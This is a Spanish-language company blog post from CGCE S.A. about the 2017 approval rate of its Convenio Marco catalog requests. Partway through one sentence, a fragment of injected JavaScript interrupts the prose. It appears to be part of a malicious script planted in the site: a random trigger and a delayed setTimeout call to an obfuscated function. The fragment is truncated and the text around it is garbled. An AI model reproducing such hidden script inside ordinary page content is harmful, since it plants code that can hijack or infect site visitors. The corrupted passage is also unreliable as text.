Área de Operaciones de CGCE aprobó el 99,8% de las solicitudes enviadas

Publicada en Publicada en Sin categoría

Para la satisfacción de nuestros clientes, tenemos el deber de informarles que durante el 2017 el Área de Operaciones de CGCE S.A tuvo un 99,8% de solicitudes aprobadas de un total de 383, donde algunos tuvieron hasta 200 productos por solicitud en cada Convenio Marco.

Las solicitudes enviadas este año corresponden a los Convenios Marco de Alimentos, Mobiliario, Hardware, Material Didáctico, Neumáticos, Deportes, Insumos Médicos, Ferretería, Aseo, Capacitaciones, entre otros.

Cabe destacar que las solicitudes enviadas este año aumentaron en un 14% con respecto año anterior.

Además, se observó un aumento del 60% en relación al 2016 de los productos con stock y sin stock, lo cual indica que los clientes están usandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando el Back Office de manera más eficiente.

El Área de Operaciones de CGCE Asesorías es la encargada de enviar solicitudes al sistema para proceder a los distintos requerimientos que nuestros clientes solicitan para contar con una buena experiencia a la hora de estar presente en el catálogo electrónico de los Convenios Marco.

Si deseas consultar por este servicio, no dudes en contactarnos.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *